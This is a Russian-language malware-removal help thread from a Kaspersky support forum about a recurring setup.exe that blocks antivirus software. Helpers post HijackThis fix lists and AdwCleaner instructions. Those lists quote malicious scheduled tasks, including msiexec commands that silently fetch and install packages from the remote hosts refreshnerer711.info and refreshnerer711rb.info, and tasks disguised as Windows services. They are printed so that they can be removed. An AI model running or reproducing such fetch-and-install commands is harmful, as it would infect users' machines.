Постоянно создается файл setup в InstallShield

1 февраля, 2019

Доброй ночи,возникла проблема с вирусом setup.exe который блочит антивирусы и не даёт себя удалить,после удаления постоянно восстанавливается. Расположен в C:\Windows\SysWOW64\InstallShield\x32 изза него постоянно зависает Браузер. Помогите с проблемой!

1 февраля, 2019

Порядок оформления запроса о помощи

Логи прикрепите к следующему сообщению в данной теме.

3 февраля, 2019

Порядок оформления запроса о помощи

Логи прикрепите к следующему сообщению в данной теме.

CollectionLog-2019.02.03-09.50.zip

3 февраля, 2019

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

сделайте свежие логи из обычного режима.

+

Скачайте AdwCleaner и сохраните его на Рабочем столе.
Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
Прикрепите отчет к своему следующему сообщению.

3 февраля, 2019

"Пофиксите" в HijackThis:

O1 - Hosts: is damaged (contains NUL characters only)
O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: Discord [command] = C:\Users\Logame\AppData\Local\Discord\app-0.0.300\Discord.exe (HKCU) (2018/04/14) (file missing)
O4 - MSConfig\startupreg: DriverPack Cloud [command] = C:\Program Files (x86)\DriverPack Cloud\DriverPackCloud.exe --run startup (HKLM) (2018/04/12) (file missing)
O4 - MSConfig\startupreg: Gaijin.Net Agent [command] = C:\Users\Logame\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe (HKCU) (2019/01/09) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Roox_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: Scartel_YotaAccess_Modems [command] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (HKLM) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\Logame\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2019/01/21)
O4-32 - HKLM\..\Run: [Roox_YotaAccess_Modems] = C:\Program Files (x86)\Yota\Yota Access (Modems)\YotaAccess.exe /minimized (file missing)
O22 - Task: BlueStacksHelper - C:\Logame\Programm\Новая папка\BlueStacks\Client\Helper\BlueStacksHelper.exe (file missing)
O22 - Task: \Microsoft\Windows\Services\WindowsUpdate32 - C:\Windows\srv_ext.exe --run (file missing)
O22 - Task: \Microsoft\Windows\WindowsBackup\WindowsBackupTask - C:\Windows\winmain64.exe --run --sh (file missing)
O22 - Task: {5008EF5A-9901-78AF-86FF-C6A75151CCC4} - C:\Windows\system32\msiexec.exe /package https://refreshnerer711.info/5b8Y14adu7Z.s1L -q
O22 - Task: {B46739DC-95A0-0F69-3A7F-DE9C89BB2D6E} - C:\Windows\SysWOW64\loAN.exe /q -package https://refreshnerer711rb.info/vIQBca2OuvKV.0S4

сделайте свежие логи из обычного режима.

+

Скачайте AdwCleaner и сохраните его на Рабочем столе.
Запустите его через правую кн. мыши от имени администратора, нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt.
Прикрепите отчет к своему следующему сообщению.

CollectionLog-2019.02.03-20.45.zip

AdwCleanerS02.txt

3 февраля, 2019

1) Не надо заниматься оверковтингом.

2) деинсталируйте

HitmanPro 3.8 [20180513]-->"C:\Program Files\HitmanPro\HitmanPro.exe" /uninstall

3) Удалите остатки avast.

4) "Пофиксите" в HijackThis:

O4 - MSConfig\startupfolder: C:^Users^Logame^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk [backup] => (lnk is corrupted) (2019/01/21) (file missing)
O4 - MSConfig\startupreg: DAEMON Tools Pro Agent [command] = C:\Program Files\DAEMON Tools Pro\DTAgent.exe -autorun (HKCU) (2018/04/24) (file missing)
O4 - MSConfig\startupreg: MegaFon_MegaFonInternet [command] = C:\Program Files (x86)\MegaFon\MegaFon Internet\MegaFonInternet.exe /minimized (HKLM) (2019/01/21) (file missing)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)

5) Проверьте этот файл на virustotal

C:\Windows\srv_ext.exe

кнопка Выбрать файл (Choose File) - ищете нужный файл у вас в системе - Открыть (Browse) - Проверить (Scan it!). Нажать на кнопку Повторить анализ (Reanalyse) если будет. Дождитесь результата . Ссылку на результат (то, что будет в адресной строке в браузере) копируете и выкладываете в теме.

6)

Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
В меню Настройки включите дополнительно в разделе Базовые действия:
- Сбросить политики IE
- Сбросить политики Chrome
В меню Панель управления нажмите Сканировать.
По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.

Изменено 4 февраля, 2019 пользователем Sandor

Постоянно создается файл setup в InstallShield

Рекомендуемые сообщения

Logame

Ссылка на комментарий

Поделиться на другие сайты

thyrex

Ссылка на комментарий

Поделиться на другие сайты

Logame

Ссылка на комментарий

Поделиться на другие сайты

regist

Ссылка на комментарий

Поделиться на другие сайты

Logame

Ссылка на комментарий

Поделиться на другие сайты

regist

Ссылка на комментарий

Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Похожий контент

Сайт

Активность

Магазин

Поддержка

Kaspersky Support Forum